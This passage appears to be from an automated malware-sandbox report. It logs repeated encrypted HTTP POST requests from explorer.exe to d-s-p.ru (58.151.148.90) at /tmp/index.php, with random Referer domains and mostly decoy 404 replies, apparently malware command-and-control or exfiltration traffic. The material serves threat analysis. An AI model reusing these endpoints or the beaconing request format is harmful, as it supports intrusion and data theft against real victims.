                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                37192.168.2.45004358.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:44:58.550888062 CET281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://wojftrqpwndwmdu.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 180
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:44:58.551001072 CET180OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2e 6b 2c 90 f5 76 0b 75 28 0d ff 88
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[.k,vu(.hxtAY81b<#A?8tV" ((AH:pY\Q {[*7AWA
                                                                                                                                                                                Dec 30, 2024 19:45:00.018645048 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:44:59 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                38192.168.2.45004458.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:00.265769005 CET279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://rcluvmsnbxjmn.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 317
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:00.265805006 CET317OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2f 6b 2c 90 f5 76 0b 75 3d 20 e7 96
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[/k,vu= fNiugHgv5D+uL!^[S:I9}|Y'p"OGrQ&-$H!@owwl\oc's
                                                                                                                                                                                Dec 30, 2024 19:45:01.707154036 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:01 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                39192.168.2.45004558.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:01.733808041 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://abpyxpuyjhta.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:01.733835936 CET182OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2c 6b 2c 90 f5 76 0b 75 37 37 cb bc
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[,k,vu77|@NGR|-H=Id!OzMnfAJMG%{K*c-Xcv>'h((
                                                                                                                                                                                Dec 30, 2024 19:45:03.192399979 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:02 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                40192.168.2.45004658.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:03.352658987 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://anvunsnhjllayr.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 209
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:03.352684021 CET209OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 2d 6b 2c 90 f5 76 0b 75 70 3d e1 91
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[-k,vup=1pZ8VYzf8\,&m!(V}@,$vc2Y5sy@_4n3_!.AM
                                                                                                                                                                                Dec 30, 2024 19:45:04.796586990 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:04 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                41192.168.2.45004758.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:04.816277027 CET280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://iupqlsqcljbulu.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 244
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:04.816296101 CET244OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 22 6b 2c 90 f5 76 0b 75 7a 35 f9 f3
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -["k,vuz5R]DLqit9q36dt+7k^.RF[1b[4otNOy1B*QcmPk:R`1qyF1&,
                                                                                                                                                                                Dec 30, 2024 19:45:06.282278061 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:05 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                42192.168.2.45004858.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:06.308528900 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ovyowegmnacdkibi.org/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 354
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:06.308549881 CET354OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 23 6b 2c 90 f5 76 0b 75 55 5c ca a0
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[#k,vuU\xTv~t= T9wst%A+83tQA:Tv\Z(tI^FBA$hc50XDggB|\JHfsOF)
                                                                                                                                                                                Dec 30, 2024 19:45:07.746192932 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:07 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                43192.168.2.45004958.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:07.769485950 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://lsjajjgmqahp.com/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:07.769511938 CET167OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 20 6b 2c 90 f5 76 0b 75 4e 53 c7 e7
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA -[ k,vuNSJ2A{+K51>q+QVF+}3&P??Ra
                                                                                                                                                                                Dec 30, 2024 19:45:09.281042099 CET206INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:08 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 2c 0b e1 fb 09 f0 91 ef e4 2f 8d 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e9 d5 7f e5 7c
                                                                                                                                                                                Data Ascii: #\6}Q,/anYp7vZW|


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                44192.168.2.45005158.151.148.90802580C:\Windows\explorer.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                Dec 30, 2024 19:45:16.954521894 CET277OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Referer: http://ovpfvtkrixi.net/
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Content-Length: 212
                                                                                                                                                                                Host: d-s-p.ru
                                                                                                                                                                                Dec 30, 2024 19:45:16.954540014 CET212OUTData Raw: 3b 6e 59 63 f2 cb 6c 54 df a3 b0 00 72 07 7d c9 7b 08 ba e3 6e 72 95 62 7e 0b 7b 97 35 cb b3 19 92 5f c1 5c 0f 1e 27 1f 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1e 1d c7 41 20 ff 2c 5b 20 6b 2c 90 f4 76 0b 75 58 02 b7 e9
                                                                                                                                                                                Data Ascii: ;nYclTr}{nrb~{5_\'? 9Yt M@NA ,[ k,vuXm%urZJ'`n@X=b -^"E0):RRd[E`NRCoO^M3A
                                                                                                                                                                                Dec 30, 2024 19:45:18.689690113 CET484INHTTP/1.1 404 Not Found
                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                Date: Mon, 30 Dec 2024 18:45:18 GMT
                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
